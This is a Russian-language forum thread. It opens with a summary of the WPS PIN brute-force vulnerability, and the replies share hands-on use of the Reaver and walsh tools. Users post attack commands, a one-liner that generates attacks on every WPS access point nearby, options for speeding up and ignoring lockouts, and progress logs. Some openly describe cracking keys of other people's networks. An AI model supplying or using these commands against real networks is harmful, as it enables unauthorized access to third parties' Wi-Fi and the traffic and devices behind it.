Уязвимость в протоколе Wi-Fi Protected Setup

Обсуждение в разделе «Беспроводные технологии/Wi-Fi/Wardriving», начал(-а) gpuhash, 30.12.2011.

  1. gpuhash

    gpuhash Elder - Старейшина

    Регистрация:
    22.09.2011
    Сообщения:
    378
    Одобрения:
    596
    Репутация:
    41
    Уязвимость в протоколе Wi-Fi Protected Setup

    Организация US Computer Emergency Readiness Team опубликовала бюллетень безопасности, описывающий уязвимость в протоколе WPS (Wi-Fi Protected Setup), предназначенном для облегчения настройки безопасности беспроводных роутеров и сетей. Сам протокол — его оригинальное название Wi-Fi Simple Config — был разработан в 2009 году специалистами ассоциации Wi-Fi Alliance целью дать возможность с некоторой долей безопасности пользоваться Wi-Fi лицам, мало сведущим в протоколах и стойких методах шифрования.

    Традиционно при создании новых WLAN необходимо было выбрать сетевое имя и кодовую фразу для точки доступа, а позднее то же самое — для каждого нового устройства, добавляемого к сети. WPS для упрощения процедуры для конечного пользователя возлагает функцию генерации сетевого имени на саму точку доступа. Для добавления нового клиентского устройства к защищенной сети достаточно будет ввести PIN-код из 4 или 8 цифр или нажать на специальные клавиши, имеющиеся на роутере и добавляемом устройстве.

    Суть уязвимости заключается в специфике общения между собой точки доступа и новым беспроводным устройством. Злоумышленник, желая получить доступ к сети жертвы, посылает некий PIN-код для аутентификации на роутере. В ответ на неправильный PIN посылается EAP-NACK сообщение таким образом, что хакер способен определить первую половину цифр PIN-кода, а вторую половину оказывается возможным определить, анализируя контрольную сумму при передаче PIN. Все это приводит к тому, что атака методом «грубой силы», вероятней всего, завершится успехом, поскольку число необходимых попыток уменьшается с 10^8 до 10^4+10^3 = 11.000, а время полного перебора PIN-кодов составит от нескольких часов до нескольких суток, в зависимости от реализации WPS на роутере.

    Пока решения проблемы не существует и тем, у кого роутер настроен на упрощенную схему безопасности, рекомендуется использовать традиционную схему аутентификации. Netgear, D-Link, Belkin и другие производители пока не прокомментировали сообщение об уязвимости.

    Копипаст с хабра
    Документ с описанием уязвимости (англ.)
    Добрые люди уже написали WPS брутфорсер

    любые вопросы не по теме удаляются !! выкладывать только инфу WPS , (reaver)


    // добавлено в карту раздела.

    за троль оффтоп , бан от 7 суток .
     
    #1 gpuhash, 30.12.2011
    В последний раз редактировалось модератором: 20.03.2013
    Это одобряют 4 пользоветелей.
  2. EksTasy

    EksTasy Member

    Регистрация:
    26.10.2008
    Сообщения:
    99
    Одобрения:
    6
    Репутация:
    2
    никто не компилил?
    скрипт на питоне от самого автора
    http://dl.dropbox.com/u/22108808/wpscrack.zip
     
    #2 EksTasy, 30.12.2011
    В последний раз редактировалось: 30.12.2011
  3. KUKLOVOD2

    KUKLOVOD2 Banned

    Регистрация:
    12.05.2011
    Сообщения:
    94
    Одобрения:
    7
    Репутация:
    1
    попробовал юзнуть wps-bruteeforcer, при команде reaver -i mon0 -b mac -c [канал\ -e [essid] пишет Failed to associate with [mac]
     
  4. jabberd

    jabberd New Member

    Регистрация:
    3.05.2010
    Сообщения:
    9
    Одобрения:
    0
    Репутация:
    0
    Стоит, наверное, обновить Reaver с помощью svn up, проблема ассоциации была решена. У меня, к сожалению, на роутере Netgear WNR3500L не работает WPS по причине установленной прошивки Tomato-USB. На чужих сетях ничего не получается, хотя Wireshark и показывает наличие настроенного WPS. У кого-нибудь уже получалось подобрать PIN и получить WPA-PSK?
     
  5. kosmaty

    kosmaty Member

    Регистрация:
    26.09.2011
    Сообщения:
    291
    Одобрения:
    34
    Репутация:
    8
    У меня не получилось и не получится.... А жаль.
    ТД организована не на базе роутера, а по-взрослому - Ubiquiti. А там такая дырявая вещь, как WPS не применяется....
     
  6. zuriuslev

    zuriuslev New Member

    Регистрация:
    24.12.2011
    Сообщения:
    142
    Одобрения:
    17
    Репутация:
    4
    Простите новичка, а как определить в Wireshark, что включен WPS ? Может фильтр какой есть ?
     
  7. penixx

    penixx Member

    Регистрация:
    24.06.2011
    Сообщения:
    135
    Одобрения:
    13
    Репутация:
    3

    ассоциация есть, но дальше ничего, пробовал 2 раза по 5 минут ждать

    root@bt:~# reaver -i mon0 -b ------------

    Reaver v1.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

    [+] Waiting for beacon from ------------
    [+] Associated with ------------ (ESSID: ------------)
    [+] 0.00% complete @ 0 seconds/attempt
    [+] 0.00% complete @ 0 seconds/attempt

    буду на других точках пробовать
     
  8. jabberd

    jabberd New Member

    Регистрация:
    3.05.2010
    Сообщения:
    9
    Одобрения:
    0
    Репутация:
    0
    Я ставил фильтр: wps.wifi_protected_setup_state == 0x02
    Мог и ошибиться, конечно, но в любом случае копать в тег-параметры (vendor specific) beacon-пакетов.

    P.S. сейчас в Reaver есть программа walsh, которая показывает точки со включённой WPS.
     
    #8 jabberd, 3.01.2012
    В последний раз редактировалось: 3.01.2012
  9. KUKLOVOD2

    KUKLOVOD2 Banned

    Регистрация:
    12.05.2011
    Сообщения:
    94
    Одобрения:
    7
    Репутация:
    1
    поподробнее про walsh плз
     
  10. zuriuslev

    zuriuslev New Member

    Регистрация:
    24.12.2011
    Сообщения:
    142
    Одобрения:
    17
    Репутация:
    4
    Например -
    walsh -i mon0 -o WPS.list
    grep -v "bad FCS" WPS.list

    и полусаем, что-то вроде -
    Scanning for supported APs...

    54:E6:FC:D1:18:F6 (null)
    D8:5D:4C:F3:44:6A ApptNet
    00:22:75:52:BD:4E Belkin_N_Wireless_52bd4e
    00:1D:7E:B4:1F:B6 lafferty
    00:19:15:D0:5C:29 WLAN_5C29
    00:24:17:BB:44:BD ThomsonE4849E
    00:50:7F:7C:E5:F8 Ellie
    -----------------------------------------
    Можно коммандный файл сгенерить -
    awk '/[0-9][A-F]/{print "reaver -i mon0 -b "$1" -e "$2}' WPS.list
    ---------------------------------------------------------------
    У меня пока безуспешно ... Пару раз проскакивало -
    [+] Trying pin 84490445
    Но дальше не продвигается.
    Кстати , walsh ловит ВСЕ точки c WPS и OPEN (без шифрования тоже)

    Напустил его на OPEN точку, работает ... :D :D :D
    [+] Waiting for beacon from 00:22:75:52:BD:4E
    [+] Associated with 00:22:75:52:BD:4E (ESSID: Belkin_N_Wireless_52bd4e)
    [+] 0.01% complete @ 37 seconds/attempt
    [+] 0.03% complete @ 20 seconds/attempt
    [+] 0.05% complete @ 19 seconds/attempt
    [+] 0.07% complete @ 16 seconds/attempt
    [+] 0.08% complete @ 31 seconds/attempt
    :D :D :D :D
     
    #10 zuriuslev, 3.01.2012
    В последний раз редактировалось модератором: 3.01.2012
    Это одобряет 1 пользователь.
  11. zuriuslev

    zuriuslev New Member

    Регистрация:
    24.12.2011
    Сообщения:
    142
    Одобрения:
    17
    Репутация:
    4
    Зацепился за одну из точек, но процесс идёт очень медленно.
    За 4 часа прогресс такой -
    [+] 9.35% complete @ 15 seconds/attempt
    [+] 9.39% complete @ 15 seconds/attempt

    Похоже, режультат будет видно через пару суток :mad:
    Надеюсь будет положительный :rolleyes:
     
  12. KUKLOVOD2

    KUKLOVOD2 Banned

    Регистрация:
    12.05.2011
    Сообщения:
    94
    Одобрения:
    7
    Репутация:
    1
    странно я когда walsh прописываю пишет не существует типо такого...
     
  13. zuriuslev

    zuriuslev New Member

    Регистрация:
    24.12.2011
    Сообщения:
    142
    Одобрения:
    17
    Репутация:
    4
    Скомпилируй последний билд из SVN

    Code:
    svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
    cd reaver-wps-read-only/src
    ./configure
    make
    make install
    Проект активно развивается, перед запуском на долгие сутки, лучше пересобрать свежачок ...

    Для ускорения перебора, можно уменьшать тайминги здесь -
    Code:
    Advanced Options:
    	-p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    	-d, --delay=<seconds>           Set the delay between pin attempts [1]
    	-l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [315]
    	-g, --max-attempts=<num>        Quit after num pin attempts
    	-x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    	-r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    	-t, --timeout=<seconds>         Set the receive timeout perio [5]
    	-T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    	-L, --ignore-locks              Ignore locked state reported by the target AP
    	-E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    	-n, --nack                      Target AP always sends a NACK [Auto]
    	-w, --win7                      Mimic a Windows 7 registrar [False]
    Согласно доке, если AP не блокирует, то время перебора будет
    не более 4 часов.
    Если придерживаться спецификаций WSC 2.0, перебор может продолжатться до 65 часов.
    С дефолтными настройками, оно так и будет.
     
    #13 zuriuslev, 3.01.2012
    В последний раз редактировалось: 4.01.2012
  14. теща

    теща Экстрасенс

    Регистрация:
    14.09.2005
    Сообщения:
    2 086
    Одобрения:
    446
    Репутация:
    186
    zuriuslev

    главное дождаться результата!
     
  15. zuriuslev

    zuriuslev New Member

    Регистрация:
    24.12.2011
    Сообщения:
    142
    Одобрения:
    17
    Репутация:
    4
    Дождусь ! У меня вся эта байда на UPS ;) А UPS всю эту байду, часов 5 продержит :D

    Кстати, 6 часов назад, автор внёс новые опции для ускорения процесса -
    Code:
    Added --dh-small option for speed improvements.
     
  16. penixx

    penixx Member

    Регистрация:
    24.06.2011
    Сообщения:
    135
    Одобрения:
    13
    Репутация:
    3
    Scapy http://www.secdev.org/projects/scapy/

    пишут ещё PyCrypto нужен, но мне на батраке не понадобилcя, наверное есть уже
     
    #16 penixx, 4.01.2012
    В последний раз редактировалось: 4.01.2012
  17. fgh_2007

    fgh_2007 Member

    Регистрация:
    28.10.2011
    Сообщения:
    65
    Одобрения:
    7
    Репутация:
    4
    у меня Backtrack5 r1 x86 и awus036nh (Ralink RT2870/3070 rt2800usb) установил драйвер compat-wireless-2012-01-03
    ./walsh -i mon0 -C -s увидеть нужные сети
    http://s010.radikal.ru/i311/1201/a2/b94e218e3e2a.png
    работает!
     
  18. penixx

    penixx Member

    Регистрация:
    24.06.2011
    Сообщения:
    135
    Одобрения:
    13
    Репутация:
    3
    какие добавлял опции к команде: reaver -i mon0 -b ------------
    или так по умолчанию и использовал ?

    а вообще здорово за 4 часа, а у меня разрывает ассоциацию ((
     
  19. zuriuslev

    zuriuslev New Member

    Регистрация:
    24.12.2011
    Сообщения:
    142
    Одобрения:
    17
    Репутация:
    4
    Поздравляю . Мньше чем за 4 часа. А ключик проверили ?

    У мня уже почти 18 часов крутится, но должно скоро закончиться ;)
    Code:
    [+] 97.30% complete @ 10 seconds/attempt
    [+] 97.35% complete @ 10 seconds/attempt
    [+] 97.39% complete @ 10 seconds/attempt
    Сейчас опять очередной лок от АП ... значит 5 минут ждёмс ...
    У меня в начале было 16 seconds/attempt, а на финише 10 seconds/attempt.
    НО ! Похоже участились локи :(
     
    #19 zuriuslev, 4.01.2012
    В последний раз редактировалось: 4.01.2012
  20. fgh_2007

    fgh_2007 Member

    Регистрация:
    28.10.2011
    Сообщения:
    65
    Одобрения:
    7
    Репутация:
    4
    Опции reaver -i mon0 -b x:x:x:x:x:x -vv --dh-small используйте эту опцию намного быстрее заметил что не на всех точках работает только с теми где хороший сигнал. Ключик подходит.

    если локи пошли Ctrl+C тамже написано [+] Session saved. Сессия сохранена если начнеш опять она возобновится (главное подождать чтоб точка очухалась) с того же места но это в версии Reaver v1.3 в v1.2 не замечал сохранений

    Если у кого-то не получается попробуйте обновить драйвер мне помогло
    Перед использованием посмотрите подходит ваш драйвер или нет:
    http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers

    вторая точка готова
    :)
     
    #20 fgh_2007, 4.01.2012
    В последний раз редактировалось: 4.01.2012
    Это одобряют 2 пользоветелей.
Загрузка...